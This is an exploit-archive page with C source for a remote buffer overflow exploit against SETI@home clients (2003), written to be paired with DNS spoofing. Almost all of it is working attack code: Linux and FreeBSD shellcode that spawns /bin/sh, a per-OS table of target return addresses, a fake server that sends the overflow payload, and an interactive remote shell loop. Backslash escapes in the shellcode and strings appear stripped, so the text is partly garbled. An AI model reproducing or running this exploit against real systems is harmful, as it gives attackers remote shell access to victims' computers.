[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : SETI@home Clients Buffer Overflow Exploit
# Published : 2003-04-08
# Author : zillion
# Previous Title : PoPToP PPTP <= 1.1.4-b3 Remote Root Exploit
# Next Title : Samba 2.2.8 Remote Root Exploit - sambal.c
/*
Seti@Home exploit by zillion[at]safemode.org (2003/01/07)
Credits for the vulnerability go to: SkyLined <SkyLined@edup.tudelft.nl>
http://spoor12.edup.tudelft.nl/SkyLined%20v4.2/?Advisories/Seti@home
Use this exploit in combination with a DNS spoofing utility such as the one
provided in the Dsniff package. http://naughty.monkey.org/~dugsong/dsniff/
*/
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <stdio.h>
#define NOP 0x41
#define EXEC "TERM=xterm; export TERM=xterm;exec /bin/sh -i"
#define EXEC2 "id;uname -a;"
char linux_shellcode[] =
/* dup */
"x31xc9x31xc0x31xdbxb3x04xb0x3fxcdx80xfexc1xb0"
"x3fxcdx80xfexc1xb0x3fxcdx80"
/* execve /bin/sh */
"x31xdbx31xc9xf7xe3x53x68x6ex2fx73x68x68x2fx2f"
"x62x69x89xe3x52x53x89xe1xb0x0bxcdx80";
char freebsd_shellcode[] =
"x31xc0x31xdbx31xc9x31xd2xb1x03xbbxffxffxffxff"
"xb2x04x43x53x52xb0x5ax50xcdx80x80xe9x01x75xf3"
"x31xc0x50x68x2fx2fx73x68x68x2f"
"x62x69x6ex89xe3x50x53x50x54x53"
"xb0x3bx50xcdx80";
char static_crap[] =
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90";
struct target
{
int num;
char *description;
char *versions;
char *type;
char *shellcode;
long retaddress;
int bufsize;
int offset;
int junk;
};
struct target targets[] =
{
{0, "Linux 2.2.* ", "3.03.i386 linux-gnu-gnulibc2.1 ", "Packet retr mode", linux_shellcode,
0xbffff420, 520, 500, 0},
{1, "Linux 2.4.* ", "3.03 i386/i686 linux-gnu-gnulibc2.1 ", "Packet retr mode", linux_shellcode,
0xbffff390, 520, 500, 1},
{2, "Linux 2.* ", "3.03.i386/i686 linux-gnulibc1-static", "Packet retr mode", linux_shellcode,
0xbffff448, 520, 500, 1},
{3, "All above ", "3.03.i386 linux* ", "Packet retr mode", linux_shellcode,
0xbffff448, 520, 300, 1},
{4, "FreeBSD ", "3.03.i386 FreeBSD-2.2.8 ", "Packet retr mode", freebsd_shellcode,
0x0004956c, 520, 1, 2},
{5, NULL, NULL, NULL, NULL, 0, 0, 0}
};
int open_socket(int port)
{
int sock,fd;
struct sockaddr_in cliAddr, servAddr;
sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock<0) {
printf("Error: Cannot open socket n");
exit(1);
}
/* bind server port */
servAddr.sin_family = AF_INET;
servAddr.sin_addr.s_addr = htonl(INADDR_ANY);
servAddr.sin_port = htons(port);
if(bind(sock, (struct sockaddr *) &servAddr, sizeof(servAddr))<0) {
printf("Error: Cannot bind to port %d n",port);
exit(1);
}
listen(sock,5);
fd=accept(sock,0,0);
return fd;
}
void usage(char *progname) {
int i;
printf("n---------------------------------------------------");
printf("n *- Seti@Home remote exploit by zillion (s-m0de) -*");
printf("n---------------------------------------------------");
printf("nnDefault : %s -h <target host>",progname);
printf("nTarget : %s -t <number>",progname);
printf("nOffset : %s -o <offset>",progname);
printf("nPort : %s -p <port>n",progname);
printf("nDebug : %s -d n",progname);
printf("nAvailable types:n");
printf("---------------------------------------------------n");
for(i = 0; targets[i].description; i++) {
fprintf(stdout, "%dt%st%st%sn", targets[i].num, targets[i].description,targets[i].
versions,targets[i].type);
}
printf("nn");
exit(0);
}
int sh(int sockfd) {
char snd[1024], rcv[1024];
fd_set rset;
int maxfd, n,test;
strcpy(snd, EXEC "n");
write(sockfd, snd, strlen(snd));
read(sockfd,rcv,7);
fflush(stdout);
strcpy(snd, EXEC2 "n");
write(sockfd, snd, strlen(snd));
/* Main command loop */
for (;;) {
FD_SET(fileno(stdin), &rset);
FD_SET(sockfd, &rset);
maxfd = ( ( fileno(stdin) > sockfd )?fileno(stdin):sockfd ) + 1;
select(maxfd, &rset, NULL, NULL, NULL);
if (FD_ISSET(fileno(stdin), &rset)) {
bzero(snd, sizeof(snd));
fgets(snd, sizeof(snd)-2, stdin);
write(sockfd, snd, strlen(snd));
}
if (FD_ISSET(sockfd, &rset)) {
bzero(rcv, sizeof(rcv));
if ((n = read(sockfd, rcv, sizeof(rcv))) == 0) {
/* exit */
return 0;
}
if (n < 0) {
perror("read");
return 1;
}
fputs(rcv, stdout);
fflush(stdout);
}
} /* for(;;) */
}
int main(int argc, char **argv){
char *buffer,*tmp;
long retaddress;
char rcv[200];
int fd,i,arg,debug=0,type=0,port=80,offset=250;
if(argc < 2) { usage(argv[0]); }
while ((arg = getopt (argc, argv, "dh:o:l:p:t:")) != -1){
switch (arg){
case 'd':
debug = 1;
break;
case 'o':
offset = atoi(optarg);
break;
case 'p':
port = atoi(optarg);
break;
case 't':
type = atoi(optarg);
break;
default :
usage(argv[0]);
}
}
if((targets[type].retaddress) != 0) {
buffer = (char *)malloc((targets[type].bufsize));
/* some junk may be required to counter buffer manipulation */
if(targets[type].junk == 1) {
tmp = (char *)malloc(strlen(static_crap) + strlen(targets[type].shellcode));
strcpy(tmp,targets[type].shellcode);
strcat(tmp,static_crap);
targets[type].shellcode = tmp;
}
memset(buffer,NOP,targets[type].bufsize);
memcpy(buffer + (targets[type].bufsize) - (strlen(targets[type].shellcode) + 8) ,targets[type].
shellcode,strlen(targets[type].shellcode));
/* Overwrite EBP and EIP */
*(long *)&buffer[(targets[type].bufsize) - 8] = (targets[type].retaddress - targets[type].offset);
// If freebsd we need to place a value without 00 in ebp
if(type == 4) {
*(long *)&buffer[(targets[type].bufsize) - 8] = 0xbfbff654;
}
*(long *)&buffer[(targets[type].bufsize) - 4] = (targets[type].retaddress - targets[type].offset);
/* Uncomment to overwrite eip and ebp with 41414141 */
if(debug == 1) {
*(long *)&buffer[(targets[type].bufsize) - 8] = 0x41414141;
*(long *)&buffer[(targets[type].bufsize) - 4] = 0x41414141;
}
}
fd = open_socket(port);
write(fd,buffer,strlen(buffer));
write(fd,"n",1);
write(fd,"n",1);
sleep(1);
sh(fd);
close(fd);
return 0;
}
// www.Syue.com [2003-04-08]